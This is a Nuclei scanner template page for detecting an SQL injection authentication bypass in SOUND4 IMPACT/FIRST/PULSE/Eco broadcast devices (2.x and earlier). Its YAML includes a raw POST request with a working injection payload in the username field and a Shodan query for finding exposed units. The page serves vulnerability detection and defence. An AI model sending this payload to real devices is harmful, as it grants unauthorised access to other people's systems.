SOUND4 IMPACT/FIRST/PULSE/Eco <= 2.x - Authentication Bypass
ID: sound4-impact-auth-bypass
Severity: high
Author: r3Y3r53
Tags: sqli,zeroscience,sound4,auth-bypass
Description
Section titled “Description”The application suffers from an SQL Injection vulnerability. Input passed through the ‘username’ POST parameter in ‘index.php’ is not properly sanitised before being returned to the user or used in SQL queries. This can be exploited to manipulate SQL queries by injecting arbitrary SQL code and bypass the authentication mechanism.
YAML Source
Section titled “YAML Source”id: sound4-impact-auth-bypass
info: name: SOUND4 IMPACT/FIRST/PULSE/Eco <= 2.x - Authentication Bypass author: r3Y3r53 severity: high description: | The application suffers from an SQL Injection vulnerability. Input passed through the 'username' POST parameter in 'index.php' is not properly sanitised before being returned to the user or used in SQL queries. This can be exploited to manipulate SQL queries by injecting arbitrary SQL code and bypass the authentication mechanism. reference: - https://www.zeroscience.mk/en/vulnerabilities/ZSL-2022-5727.php metadata: verified: true max-request: 1 shodan-query: http.favicon.hash:-1548359600 tags: sqli,zeroscience,sound4,auth-bypass
http: - raw: - | POST /index.php HTTP/1.1 Host: {{Hostname}} Content-Type: application/x-www-form-urlencoded
username=%27%2Bjoxvy--%2Bz&password=ffesdf
redirects: true max-redirects: 2 matchers: - type: dsl dsl: - 'status_code == 200' - 'contains_all(body, "Network Diagnostic:", "disconnect the user")' condition: and# digest: 4a0a00473045022100cdfa198efb8d5bf095ffa185a5d46f46f3357419d0bdadd22f64eea43770497d0220029754195cfd71af045dcd7181ea090d4065aa81ee8d582c831f7a14e174e1d2:922c64590222798bb761d5b6d8e72950Guide to check the vulnerabilities
Section titled “Guide to check the vulnerabilities”This template is used to detect vulnerabilities in web applications. It can be used with the Nuclei tool to scan for specific patterns or behaviors.
$ nuclei -u "URL" -t "http/vulnerabilities/other/sound4-impact-auth-bypass.yaml"